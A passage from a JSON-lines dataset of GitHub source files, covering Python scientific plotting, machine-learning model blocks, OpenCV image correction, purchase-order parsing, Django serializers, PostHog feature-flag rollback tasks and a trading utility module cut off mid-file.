cvs, crho\n\n\n\ndepths = np.linspace(0,10000., 1000)\nfig = plt.figure(1, figsize=(12,9))\nzrats, upos, zcorrs =[],[], []\nrrats, wpos, rcorrs = [], [], []\nzratsb, uposb, zcorrsb =[],[],[]\nf = open('Theresults')\nfor line in f:\n line = line.split(', ')\n lat, lon = float(line[1]), float(line[2])\n rcorr = float(line[3])\n rrat = float(line[4])*10**9\n zcorr = float(line[5])\n zrat = float(line[6])*10**9\n vp, vs, rho = get_upo(lat, lon, depths)\n try:\n vp = np.mean(vp[depths <= 3500.])\n vs = np.mean(vs[depths <= 3500.])\n rho =np.mean(rho[depths <= 3500.])\n except:\n continue\n mu = rho*vs**2\n lam = rho*vp**2 - 2*mu\n # eqn 23 of sorrells\n c0=340.\n # # return in units of nm/s/Pa\n #upo = (c0/(2*(lam+mu)))*10**9\n upo = c0*(lam + 2*mu)/(2*mu*(lam+mu))*10**9\n print(line[0])\n mval = upo\n #mval = np.mean(upo[depths <= 7500.])\n upo = mval\n\n\n if upo >= 20:\n upo=20.\n #if zrat >=30:\n # zrat = 30.\n #if wpo > 100:\n # wpo=100.\n if rrat >=100:\n rrat = 100.\n if zrat >= 20:\n zrat = 20.\n #continue\n\n #if zrat > 20:\n if zcorr >= 0.8:\n print(line[0] + ' ' + str(zrat) + ' ' + str(upo))\n\n if (zcorr >= 0.8) and (upo < 20.):\n zrats.append(zrat)\n upos.append(upo)\n zcorrs.append(zcorr)\n else:\n zratsb.append(zrat)\n uposb.append(upo)\n zcorrsb.append(zcorr)\n if rcorr >= 0.8:\n rrats.append(rrat)\n rcorrs.append(rcorr)\n # wpos.append(wpo)\n\npzv = np.polyfit(upos, zrats,1)\nprint(pzv)\npz = np.poly1d(pzv)\n#prv= np.polyfit(wpos, rrats,1)\n#pr = np.poly1d(prv)\n#plt.subplot(1,2,1)\nec=plt.scatter(upos, zrats, c=zcorrs, marker='o', vmin=0, vmax=1., label='Used in Fit')\nplt.scatter(uposb, zratsb, c=zcorrsb, marker='s', vmin=0, vmax=1., alpha=0.5, label='Not Used in Fit')\nplt.plot(np.linspace(0,90,100), pz(np.linspace(0,90,100)), color='r', label= 'Slope=' + str(round(pzv[0],3)) )\n\nplt.plot(np.linspace(0,90,100),np.linspace(0,90,100), label= 'Slope=1', color='k')\nplt.xlabel('Vertical Ratio Crust 1.0 (nm/s/Pa)')\nplt.ylabel('Vertical Ratio Hunga Tonga (nm/s/Pa)')\nplt.xlim((0.,21.))\nplt.ylim(0.,21.)\nplt.legend(loc='lower right', ncol=2)\ncbar = plt.colorbar(ec)\ncbar.set_label('Correlation Vertial to Hilbert Transform of Pressure')\n# plt.subplot(1,2,2)\n# plt.scatter(wpos, rrats, c=rcorrs)\n# plt.plot(np.linspace(0,30,100), pr(np.linspace(0,30,100)), color='r')\n# plt.xlabel('Radial Ratio Crust 1.0 (nm/s/Pa)')\n# plt.ylabel('Radial Ratio Hunga Tonga (nm/s/Pa)')\n# plt.xlim((0.,100.))\n# plt.ylim(0.,100.)\n# #plt.tight_layout()\nplt.savefig('Figure6.png', format='PNG', dpi=400)\nplt.savefig('Figure6.pdf', format='PDF', dpi=400)\nf.close()\n\n","repo_name":"aringler-usgs/Tonga_SA","sub_path":"figure6.py","file_name":"figure6.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22736416632","text":"# Special quantity for ion thermal energy\n\n\nimport scipy.constants\nfrom . FluidQuantity import FluidQuantity\nfrom . IonSpeciesFluidQuantity import IonSpeciesFluidQuantity\n\n\nclass IonThermalEnergy(IonSpeciesFluidQuantity):\n \n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Constructor.\n \"\"\"\n super().__init__(*args, **kwargs)\n\n\n def getTemperature(self, ion=None):\n \"\"\"\n Returns the temperature of the named ion species. If no\n ion name is provided, a compound ion temperature object\n is returned, containing T_i for all ions.\n \"\"\"\n ec = scipy.constants.e\n\n if ion is None:\n W_i = self.data[:]\n N_i = self.output.eqsys.N_i.data[:]\n T_i = (2/3) * (W_i/ec) / N_i\n\n return IonSpeciesFluidQuantity(name='T_i', data=T_i, grid=self.grid, output=self.output, attr=self.attr)\n else:\n W_i = self[ion][:]\n N_i = self.output.eqsys.N_i[ion][:]\n T_i = (2/3) * (W_i/ec) / N_i\n\n return FluidQuantity(name=f'Ti_{ion}', data=T_i, grid=self.grid, output=self.output, attr=self.attr)\n\n\n def plotTemperature(self, ion=None, ax=None, show=None, r=None, t=None, *args, **kwargs):\n \"\"\"\n Plot ion temperature\n \"\"\"\n T_i = self.getTemperature(ion)\n return T_i.plot(ax=ax, show=show, r=r, t=t, *args, **kwargs)\n\n","repo_name":"chalmersplasmatheory/DREAM","sub_path":"py/DREAM/Output/IonThermalEnergy.py","file_name":"IonThermalEnergy.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"31202255573","text":"import sys\nseq = []\nwhile True:\n num = input().split('\\n')\n seq += num\n if '0' in num:\n seq = [int(i) for i in seq]\n seq.remove(max(seq))\n print(max(seq))\n sys.exit(0)\n","repo_name":"samikhailov/coursera","sub_path":"python_osnovy_programmirovaniya/week_2/vtoroi_maksimum.py","file_name":"vtoroi_maksimum.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36575691910","text":"import spconv.pytorch as spconv\nimport torch\nimport torch.nn as nn\nfrom spconv.pytorch.modules import SparseModule\n\nimport copy\nfrom collections import OrderedDict\n\n\nclass BatchNormDim1Swap(nn.BatchNorm1d):\n \"\"\"\n Used for nn.Transformer that uses a HW x N x C rep\n \"\"\"\n\n def forward(self, x):\n \"\"\"\n x: HW x N x C\n permute to N x C x HW\n Apply BN on C\n permute back\n \"\"\"\n hw, n, c = x.shape\n x = x.permute(1, 2, 0)\n x = super(BatchNormDim1Swap, self).forward(x)\n # x: n x c x hw -> hw x n x c\n x = x.permute(2, 0, 1)\n return x\n\n\nNORM_DICT = {\n \"bn\": BatchNormDim1Swap,\n \"bn1d\": nn.BatchNorm1d,\n \"id\": nn.Identity,\n \"ln\": nn.LayerNorm,\n}\n\nACTIVATION_DICT = {\n \"relu\": nn.ReLU,\n \"gelu\": nn.GELU,\n}\n\nWEIGHT_INIT_DICT = {\n \"xavier_uniform\": nn.init.xavier_uniform_,\n}\n\n\ndef ln_norm(x):\n return nn.GroupNorm(1, x)\n\n\nclass GenericMLP(nn.Module):\n def __init__(\n self,\n input_dim,\n hidden_dims,\n output_dim,\n norm_fn_name=None,\n activation=\"relu\",\n use_conv=False,\n dropout=None,\n hidden_use_bias=False,\n output_use_bias=True,\n output_use_activation=False,\n output_use_norm=False,\n weight_init_name=None,\n ):\n super().__init__()\n activation = ACTIVATION_DICT[activation]\n norm = None\n if norm_fn_name is not None:\n norm = NORM_DICT[norm_fn_name]\n if norm_fn_name == \"ln\" and use_conv:\n norm = ln_norm # easier way to use LayerNorm\n\n if dropout is not None:\n if not isinstance(dropout, list):\n dropout = [dropout for _ in range(len(hidden_dims))]\n\n layers = []\n prev_dim = input_dim\n for idx, x in enumerate(hidden_dims):\n if use_conv:\n layer = nn.Conv1d(prev_dim, x, 1, bias=hidden_use_bias)\n else:\n layer = nn.Linear(prev_dim, x, bias=hidden_use_bias)\n layers.append(layer)\n if norm:\n layers.append(norm(x))\n layers.append(activation())\n if dropout is not None:\n layers.append(nn.Dropout(p=dropout[idx]))\n prev_dim = x\n if use_conv:\n layer = nn.Conv1d(prev_dim, output_dim, 1, bias=output_use_bias)\n else:\n layer = nn.Linear(prev_dim, output_dim, bias=output_use_bias)\n layers.append(layer)\n\n if output_use_norm:\n layers.append(norm(output_dim))\n\n if output_use_activation:\n layers.append(activation())\n\n self.layers = nn.Sequential(*layers)\n\n if weight_init_name is not None:\n self.do_weight_init(weight_init_name)\n\n def do_weight_init(self, weight_init_name):\n func = WEIGHT_INIT_DICT[weight_init_name]\n for (_, param) in self.named_parameters():\n if param.dim() > 1: # skips batchnorm/layernorm\n func(param)\n\n def forward(self, x, channel_last=False):\n # if transpose_swap:\n # x = x.permute(0,2,1)\n output = self.layers(x)\n\n if channel_last:\n output = output.permute(0, 2, 1)\n return output\n\n\ndef get_clones(module, N):\n return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\ndef unique_with_inds(x, dim=-1):\n unique, inverse = torch.unique(x, return_inverse=True, dim=dim)\n perm = torch.arange(inverse.size(dim), dtype=inverse.dtype, device=inverse.device)\n inverse, perm = inverse.flip([dim]), perm.flip([dim])\n return unique, inverse.new_empty(unique.size(dim)).scatter_(dim, inverse, perm)\n\n\nclass MLP(nn.Sequential):\n def __init__(self, in_channels, out_channels, norm_fn=None, num_layers=2):\n modules = []\n for _ in range(num_layers - 1):\n modules.append(nn.Linear(in_channels, in_channels))\n if norm_fn:\n modules.append(norm_fn(in_channels))\n modules.append(nn.ReLU())\n modules.append(nn.Linear(in_channels, out_channels))\n return super().__init__(*modules)\n\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n nn.init.constant_(m.bias, 0)\n nn.init.normal_(self[-1].weight, 0, 0.01)\n nn.init.constant_(self[-1].bias, 0)\n\n\n# current 1x1 conv in spconv2x has a bug. It will be removed after the bug is fixed\nclass Custom1x1Subm3d(spconv.SparseConv3d):\n def forward(self, input):\n features = torch.mm(input.features, self.weight.view(self.out_channels, self.in_channels).T)\n if self.bias is not None:\n features += self.bias\n out_tensor = spconv.SparseConvTensor(features, input.indices, input.spatial_shape, input.batch_size)\n out_tensor.indice_dict = input.indice_dict\n out_tensor.grid = input.grid\n return out_tensor\n\n\nclass ResidualBlock(SparseModule):\n def __init__(self, in_channels, out_channels, norm_fn, indice_key=None):\n super().__init__()\n\n if in_channels == out_channels:\n self.i_branch = spconv.SparseSequential(nn.Identity())\n else:\n self.i_branch = spconv.SparseSequential(\n Custom1x1Subm3d(in_channels, out_channels, kernel_size=1, bias=False)\n )\n\n self.conv_branch = spconv.SparseSequential(\n norm_fn(in_channels),\n nn.ReLU(),\n spconv.SubMConv3d(in_channels, out_channels, kernel_size=3, padding=1, bias=False, indice_key=indice_key),\n norm_fn(out_channels),\n nn.ReLU(),\n spconv.SubMConv3d(out_channels, out_channels, kernel_size=3, padding=1, bias=False, indice_key=indice_key),\n )\n\n def forward(self, input):\n identity = spconv.SparseConvTensor(input.features, input.indices, input.spatial_shape, input.batch_size)\n output = self.conv_branch(input)\n out_feats = output.features + self.i_branch(identity).features\n output = output.replace_feature(out_feats)\n\n return output\n\n\nclass UBlock(nn.Module):\n def __init__(self, nPlanes, norm_fn, block_reps, block, indice_key_id=1):\n\n super().__init__()\n\n self.nPlanes = nPlanes\n\n blocks = {\n \"block{}\".format(i): block(nPlanes[0], nPlanes[0], norm_fn, indice_key=\"subm{}\".format(indice_key_id))\n for i in range(block_reps)\n }\n blocks = OrderedDict(blocks)\n self.blocks = spconv.SparseSequential(blocks)\n\n if len(nPlanes) > 1:\n self.conv = spconv.SparseSequential(\n norm_fn(nPlanes[0]),\n nn.ReLU(),\n spconv.SparseConv3d(\n nPlanes[0],\n nPlanes[1],\n kernel_size=2,\n stride=2,\n bias=False,\n indice_key=\"spconv{}\".format(indice_key_id),\n ),\n )\n\n self.u = UBlock(nPlanes[1:], norm_fn, block_reps, block, indice_key_id=indice_key_id + 1)\n\n self.deconv = spconv.SparseSequential(\n norm_fn(nPlanes[1]),\n nn.ReLU(),\n spconv.SparseInverseConv3d(\n nPlanes[1], nPlanes[0], kernel_size=2, bias=False, indice_key=\"spconv{}\".format(indice_key_id)\n ),\n )\n\n blocks_tail = {}\n for i in range(block_reps):\n blocks_tail[\"block{}\".format(i)] = block(\n nPlanes[0] * (2 - i), nPlanes[0], norm_fn, indice_key=\"subm{}\".format(indice_key_id)\n )\n blocks_tail = OrderedDict(blocks_tail)\n self.blocks_tail = spconv.SparseSequential(blocks_tail)\n\n def forward(self, input):\n\n output = self.blocks(input)\n identity = spconv.SparseConvTensor(output.features, output.indices, output.spatial_shape, output.batch_size)\n if len(self.nPlanes) > 1:\n output_decoder = self.conv(output)\n output_decoder = self.u(output_decoder)\n output_decoder = self.deconv(output_decoder)\n out_feats = torch.cat((identity.features, output_decoder.features), dim=1)\n output = output.replace_feature(out_feats)\n output = self.blocks_tail(output)\n return output\n\n\nclass PositionalEmbedding(nn.Module):\n def __init__(self, in_channels, N_freqs, logscale=True):\n \"\"\"\n Defines a function that embeds x to (x, sin(2^k x), cos(2^k x), ...)\n in_channels: number of input channels (3 for both xyz and direction)\n \"\"\"\n super(PositionalEmbedding, self).__init__()\n self.N_freqs = N_freqs\n self.in_channels = in_channels\n self.funcs = [torch.sin, torch.cos]\n self.out_channels = in_channels * (len(self.funcs) * N_freqs + 1)\n\n if logscale:\n self.freq_bands = 2 ** torch.linspace(0, N_freqs - 1, N_freqs)\n else:\n self.freq_bands = torch.linspace(1, 2 ** (N_freqs - 1), N_freqs)\n\n def forward(self, x):\n \"\"\"\n Embeds x to (x, sin(2^k x), cos(2^k x), ...)\n Different from the paper, \"x\" is also in the output\n See https://github.com/bmild/nerf/issues/12\n Inputs:\n x: (B, self.in_channels)\n Outputs:\n out: (B, self.out_channels)\n \"\"\"\n out = [x]\n for freq in self.freq_bands:\n for func in self.funcs:\n out += [func(freq * x)]\n\n return torch.cat(out, -1)\n\n\nclass Conv1d(torch.nn.Conv1d):\n def __init__(self, *args, **kwargs):\n \"\"\"\n Extra keyword arguments supported in addition to those in `torch.nn.Conv2d`:\n Args:\n norm (nn.Module, optional): a normalization layer\n activation (callable(Tensor) -> Tensor): a callable activation function\n It assumes that norm layer is used before activation.\n \"\"\"\n norm = kwargs.pop(\"norm\", None)\n activation = kwargs.pop(\"activation\", None)\n super().__init__(*args, **kwargs)\n\n self.norm = norm\n self.activation = activation\n\n def forward(self, x):\n if x.numel() == 0 and self.training:\n # https://github.com/pytorch/pytorch/issues/12013\n assert not isinstance(self.norm, torch.nn.SyncBatchNorm), \"SyncBatchNorm does not support empty inputs!\"\n\n x = super().forward(x)\n if self.norm is not None:\n x = self.norm(x)\n if self.activation is not None:\n x = self.activation(x)\n return x\n\n\ndef conv_with_kaiming_uniform(norm=None, activation=None, use_sep=False):\n def make_conv(in_channels, out_channels):\n conv_func = Conv1d\n if use_sep:\n assert in_channels == out_channels\n groups = in_channels\n else:\n groups = 1\n\n conv = conv_func(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, groups=groups, bias=(norm is None)\n )\n\n nn.init.kaiming_uniform_(conv.weight, a=1)\n if norm is None:\n nn.init.constant_(conv.bias, 0)\n\n module = [\n conv,\n ]\n if norm is not None and len(norm) > 0:\n norm_module = torch.nn.BatchNorm1d(out_channels)\n module.append(norm_module)\n if activation is not None:\n module.append(nn.ReLU(inplace=True))\n if len(module) > 1:\n return nn.Sequential(*module)\n return conv\n\n return make_conv\n","repo_name":"VinAIResearch/ISBNet","sub_path":"isbnet/model/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":11569,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"53"} +{"seq_id":"34436420945","text":"# este programa corrige la distorsión de las imágenes\n# dados los parámetros intrínsecos de la cámara utilizada\n\nimport numpy as np\nimport cv2 as cv\nimport glob\n\n# cargamos los parámetros intrínsecos\nK = np.load('data/intrinsic_matrix.npy')\ndist = np.load('data/distortion_coeffs.npy')\n\n# array con los paths de las imágenes que se van a utilizar\nimages = glob.glob('imagenes/*.png')\n\nnumero_imagen = 0\nfor fname in images:\n numero_imagen += 1\n img = cv.imread(fname)\n h, w = img.shape[:2]\n newK, roi = cv.getOptimalNewCameraMatrix(K, dist, (w,h), 1, (w,h))\n\n # corrige la imagen\n dst = cv.undistort(img, K, dist, None, newK)\n\n # crop the image\n # x, y, w, h = roi\n # dst = dst[y:y+h, x:x+w]\n\n # guardamos las imágenes con la distorsión corregida\n cv.imwrite('imagenes_corregidas/undist'+str(numero_imagen)+'.png', dst)\n\n","repo_name":"luciadelacaridad/TFGProject_ComputationalPhotography","sub_path":"undistortion.py","file_name":"undistortion.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75335455528","text":"\ndef solution1(n,moves):\n x = 1\n y = 1\n\n for i in moves:\n if i is 'R':\n if y != n: y += 1\n elif i is 'U':\n if x != 1: x += 1\n elif i is 'D':\n if x != n: x += 1\n elif i is 'L':\n if y != 1: y += 1\n\n print(x,y)\n\ndef solution2(n):\n result = 0\n for i in range(n+1):\n for j in range(60):\n for k in range(60):\n if '3' in str(i)+str(j)+str(k):\n result+=1\n return result\n\ndef solution3(position):\n row = int(position[1])\n col = int(ord(position[0])) - int(ord('a')) +1\n result = 0\n steps =[(-2,-1),(-1,-2),(-2,1),(-1,2),(2,-1),(1,-2),(2,1),(1,2)]\n\n for step in steps:\n next_row = row + step[0]\n next_col = col + step[1]\n if next_row >= 1 and next_row <= 8 and next_col >=1 and next_col <= 8 :\n result += 1\n return result\n\nsolution1(5,['R','R','R','U','D','D'])\nprint(\"****\")\nprint(solution2(5))\nprint(\"****\")\nprint(solution3(\"a1\"))\nprint(solution3(\"c3\"))","repo_name":"jeongy616/Algorithm-Study","sub_path":"books/It's Coding Test/implementation.py","file_name":"implementation.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74336260006","text":"import re\nfrom datetime import datetime\nfrom po_formats.po_base import PO_BASE\n\nclass PO_TYPE_8(PO_BASE):\n def __init__(self, poDocFilepath: str) -> None:\n super().__init__(poDocFilepath)\n\n def __buyer(self)->str:\n \"\"\"\n Returns the buyer name \n \"\"\"\n return 'RENFOLD LTD'\n\n def __company(self)->str:\n \"\"\"\n Returns the company name\n \"\"\"\n return 'CENTRO INTERNATIONAL SOURCING LIMITED'\n\n def __poNumber(self)->int:\n \"\"\"\n Returns the purchase order number\n \"\"\"\n return int(re.findall(r\"PURCHASE\\s+ORDER\\s+NUMBER\\s?\\n\\s?PO\\-(\\d+)\\s?\\n\",self.getPage(1).upper())[0])\n\n def __poDate(self)->str:\n \"\"\"\n Returns the purchase order date\n \"\"\"\n (_d,_m,_y) = re.findall(r\"PURCHASE\\s+ORDER\\s+DATE\\s?\\n\\s?(\\d{1,2})[\\s\\.,\\-/]{1,3}([A-Z]*\\d{0,2})[\\s\\.,\\-/]{1,3}(\\d{2,4})\\s?\\n\",self.getPage(1).upper())[0]\n\n try:\n return datetime.strptime(f\"{_d}.{_m[0:3]}.{_y[-2:]}\",\"%d.%b.%y\").strftime(\"%d-%b-%y\")\n except ValueError:\n return datetime.strptime(f\"{_d}.{_m}.{_y[-2:]}\",\"%d.%m.%y\").strftime(\"%d-%b-%y\")\n\n def __currency(self)->str:\n \"\"\"\n Returns the currency type\n \"\"\"\n return \"$\"\n\n def __shipDate(self)->str:\n \"\"\"\n Returns the ship date\n \"\"\"\n (_d,_m,_y) = re.findall(r\"DELIVERY\\s+DATE\\s?\\n\\s?(\\d{1,2})[\\s\\.,\\-/]{1,3}([A-Z]*\\d{0,2})[\\s\\.,\\-/]{1,3}(\\d{2,4})\\s?\\n\",self.getPage(1).upper())[0]\n\n try:\n return datetime.strptime(f\"{_d}.{_m[0:3]}.{_y[-2:]}\",\"%d.%b.%y\").strftime(\"%d-%b-%y\")\n except ValueError:\n return datetime.strptime(f\"{_d}.{_m}.{_y[-2:]}\",\"%d.%m.%y\").strftime(\"%d-%b-%y\")\n\n def __shipmentMode(self)->str:\n \"\"\"\n Returns the shipment mode\n \"\"\"\n return \"SEA\"\n\n def __getRecords(self)->list[tuple]:\n _all_content = \"\".join([self.getPage(pageNumber) for pageNumber in range(1,self.numPages()+1)])\n return re.findall(r\"([0-9A-Z]+)\\s+\\-\\s+([A-Z\\-\\s]+\\n?[A-Z\\-\\s]*)\\n?([\\d\\.]+)\\s+([\\d\\.]+)\\s+([\\d,]+)\",_all_content.upper())\n\n def __style(self,record_index:int)->str:\n \"\"\"\n Returns the style\n \"\"\"\n _records = self.__getRecords()\n if record_index>=0 and record_indexstr:\n \"\"\"\n Returns the style description\n \"\"\"\n _records = self.__getRecords()\n if record_index>=0 and record_indexint:\n \"\"\"\n Returns the total quantity\n \"\"\"\n _records = self.__getRecords()\n if recordIndex>=0 and recordIndexdict:\n \"\"\"\n Returns the purchase orders details\n \"\"\"\n dest = \"UNITED KINGDOM\"\n poDict = {}\n records = self.__getRecords()\n if recordIndex>=0 and recordIndexlist:\n \"\"\"\n Returns a list of purchase order data details\n \"\"\"\n def getPoDetailsDict(recordIndex:int)->dict:\n poDetails = {\n \"team\":\"\",\n \"src_merc\":\"\",\n \"company\":self.__company(),\n \"consignee\":self.__buyer(),\n \"buyer\":self.__buyer(),\n \"category\":\"\",\n \"dept\":\"\",\n \"season_year\":\"\",\n \"season\":\"\",\n \"style\":self.__style(recordIndex),\n \"style_desc\":self.__styleDescription(recordIndex),\n \"gmt_item\":\"\",\n \"uom\":\"\",\n \"ratio\":\"\",\n \"total_qty\":self.__totalQuantity(recordIndex),\n \"currency\":self.__currency(),\n \"factory\":\"\",\n \"fabric_src\":\"\",\n \"fabric\": '',\n \"fabric_mill\":\"\",\n \"sust_fabric\":\"\",\n \"po_num\":self.__poNumber(),\n \"po_date\":self.__poDate(),\n \"po_status\":\"\",\n \"shipment_mode\":self.__shipmentMode(),\n \"purchase_orders\":self.__purchaseOrders(recordIndex)\n }\n return poDetails\n\n poDetailsList = []\n records = self.__getRecords()\n for recordIndex in range(0,len(records)):\n poDetailsList.append(getPoDetailsDict(recordIndex))\n\n return poDetailsList\n\n def output(self)->tuple:\n \"\"\"\n Returns the extracted data\n \"\"\"\n return (self.__poDetails())","repo_name":"dimuthukag/po-extractor","sub_path":"po_formats/po_type_8.py","file_name":"po_type_8.py","file_ext":"py","file_size_in_byte":5632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74739467369","text":"from rest_framework import serializers\nfrom rest_framework.validators import UniqueTogetherValidator\nfrom coursetomajor.models import CourseToMajor\n\n\nclass CourseToMajorSerializer(serializers.ModelSerializer):\n class Meta:\n model = CourseToMajor\n fields = '__all__'\n depth = 3\n\n @staticmethod\n def setup_eager_loading(queryset):\n queryset = queryset.select_related(\n 'course',\n 'course__level',\n 'course__dept',\n 'course__dept__college',\n 'level',\n 'major',\n 'major__dept',\n 'major__dept__college',)\n return queryset\n\n\nclass CourseToMajorCreateSerializer(serializers.ModelSerializer):\n class Meta:\n validators = [\n UniqueTogetherValidator(\n queryset=CourseToMajor.objects.all(),\n fields=('course', 'major')\n )\n ]\n model = CourseToMajor\n fields = '__all__'\n","repo_name":"GHostEater/Portal","sub_path":"coursetomajor/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16758077239","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nmass = []\ndiam = []\ntime = []\npoly = []\n\nf = open(\"stats_sand_v2.6TjqaM23742475.txt\")\nfor ligne in f.readlines():\n data = ligne.split(\" \")\n mass += [int(data[0].split(\"=\")[1])]\n # time += [int(data[1].split(\"=\")[1])]\n diam += [int(data[2].split(\"=\")[1])*2*10**7]\nf.close()\n\np = np.poly1d(np.polyfit(mass,[p*p for p in diam],1))\n# plt.plot(mass,[p(x) for x in mass],label = 'linear approach')\n\nplt.plot(mass,[np.sqrt(p(mass[x]))-diam[x] for x in range(0,len(diam))],label='diffenrential')\nplt.ylabel('difference')\nplt.xlabel('mass')\nplt.legend()\nplt.show()\n\nprint(np.polyfit(mass,np.log(diam),1))\n","repo_name":"etouss/Tas-de-sable","sub_path":"stats/scr2_local.py","file_name":"scr2_local.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39605613827","text":"\"\"\"\nСоздайте класс-функцию, который считает факториал числа при\nвызове экземпляра.\nЭкземпляр должен запоминать последние k значений.\nПараметр k передаётся при создании экземпляра.\nДобавьте метод для просмотра ранее вызываемых значений и\nих факториалов.\n\n\"\"\"\n\n\nclass FactorialOf:\n _values = {}\n\n def __init__(self, base: int):\n self._base = base\n self._calc()\n\n def _calc(self):\n self.out = 1\n for i in range(1, self._base + 1):\n if i not in FactorialOf._values:\n print(\"calc of\", i)\n self.out = self.out * i\n FactorialOf._values[i] = self.out\n else:\n self.out = FactorialOf._values[i]\n\n def __call__(self):\n return self.out\n\n def get_vals(self):\n return FactorialOf._values\n\n\nif __name__ == '__main__':\n a = FactorialOf(100)\n print(a())\n b = FactorialOf(99)\n print(b())\n print(b.get_vals())\n","repo_name":"am1bestofluck/python_insight","sub_path":"sem12/t_1.py","file_name":"t_1.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39501018489","text":"from datetime import datetime, timedelta\nfrom typing import Dict\nfrom zoneinfo import ZoneInfo\n\nfrom celery import shared_task\n\nfrom ee.api.sentry_stats import get_stats_for_timerange\nfrom posthog.models.feature_flag import FeatureFlag\nfrom posthog.models.filters.filter import Filter\nfrom posthog.models.team import Team\nfrom posthog.queries.trends.trends import Trends\n\n\ndef check_flags_to_rollback():\n flags_with_threshold = FeatureFlag.objects.exclude(rollback_conditions__isnull=True).exclude(\n rollback_conditions__exact=[]\n )\n\n for feature_flag in flags_with_threshold:\n check_feature_flag_rollback_conditions(feature_flag_id=feature_flag.pk)\n\n\n@shared_task(ignore_result=True, max_retries=2)\ndef check_feature_flag_rollback_conditions(feature_flag_id: int) -> None:\n flag: FeatureFlag = FeatureFlag.objects.get(pk=feature_flag_id)\n\n if any(check_condition(condition, flag) for condition in flag.rollback_conditions):\n flag.performed_rollback = True\n flag.active = False\n flag.save()\n\n\ndef calculate_rolling_average(threshold_metric: Dict, team: Team, timezone: str) -> float:\n curr = datetime.now(tz=ZoneInfo(timezone))\n\n rolling_average_days = 7\n\n filter = Filter(\n data={\n **threshold_metric,\n \"date_from\": (curr - timedelta(days=rolling_average_days)).strftime(\"%Y-%m-%d %H:%M:%S.%f\"),\n \"date_to\": curr.strftime(\"%Y-%m-%d %H:%M:%S.%f\"),\n },\n team=team,\n )\n trends_query = Trends()\n result = trends_query.run(filter, team)\n\n if not len(result):\n return False\n\n data = result[0][\"data\"]\n\n return sum(data) / rolling_average_days\n\n\ndef check_condition(rollback_condition: Dict, feature_flag: FeatureFlag) -> bool:\n if rollback_condition[\"threshold_type\"] == \"sentry\":\n created_date = feature_flag.created_at\n base_start_date = created_date.strftime(\"%Y-%m-%dT%H:%M:%S\")\n base_end_date = (created_date + timedelta(days=1)).strftime(\"%Y-%m-%dT%H:%M:%S\")\n\n current_time = datetime.utcnow()\n target_end_date = current_time.strftime(\"%Y-%m-%dT%H:%M:%S\")\n target_start_date = (current_time - timedelta(days=1)).strftime(\"%Y-%m-%dT%H:%M:%S\")\n\n base, target = get_stats_for_timerange(base_start_date, base_end_date, target_start_date, target_end_date)\n\n if rollback_condition[\"operator\"] == \"lt\":\n return target < float(rollback_condition[\"threshold\"]) * base\n else:\n return target > float(rollback_condition[\"threshold\"]) * base\n\n elif rollback_condition[\"threshold_type\"] == \"insight\":\n rolling_average = calculate_rolling_average(\n rollback_condition[\"threshold_metric\"],\n feature_flag.team,\n feature_flag.team.timezone,\n )\n\n if rollback_condition[\"operator\"] == \"lt\":\n return rolling_average < rollback_condition[\"threshold\"]\n else:\n return rolling_average > rollback_condition[\"threshold\"]\n\n return False\n","repo_name":"PostHog/posthog","sub_path":"ee/tasks/auto_rollback_feature_flag.py","file_name":"auto_rollback_feature_flag.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"11032355750","text":"import math\nimport uuid\nimport time\nimport logging\nimport calendar\nfrom datetime import datetime\n\nfrom config.Config import getHolidays\n\nclass Utils:\n dateFormat = \"%Y-%m-%d\"\n timeFormat = \"%H:%M:%S\"\n dateTimeFormat = \"%Y-%m-%d %H:%M:%S\"\n\n @staticmethod\n def initLoggingConfig():\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO, datefmt=\"%Y-%m-%d %H:%M:%S\")\n\n @staticmethod\n def roundOff(price): # Round off to 2 decimal places\n return round(price, 2)\n \n @staticmethod\n def roundToNSEPrice(price):\n x = round(price, 2) * 20\n y = math.ceil(x)\n return y / 20\n\n @staticmethod\n def isMarketOpen():\n if Utils.isTodayHoliday():\n return False\n now = datetime.now()\n marketStartTime = Utils.getMarketStartTime()\n marketEndTime = Utils.getMarketEndTime()\n return now >= marketStartTime and now <= marketEndTime\n\n @staticmethod\n def isMarketClosedForTheDay():\n # This method returns true if the current time is > marketEndTime\n # Please note this will not return true if current time is < marketStartTime on a trading day\n if Utils.isTodayHoliday():\n return True\n now = datetime.now()\n marketEndTime = Utils.getMarketEndTime()\n return now > marketEndTime\n\n @staticmethod\n def waitTillMarketOpens(context):\n nowEpoch = Utils.getEpoch(datetime.now())\n marketStartTimeEpoch = Utils.getEpoch(Utils.getMarketStartTime())\n waitSeconds = marketStartTimeEpoch - nowEpoch\n if waitSeconds > 0:\n logging.info(\"%s: Waiting for %d seconds till market 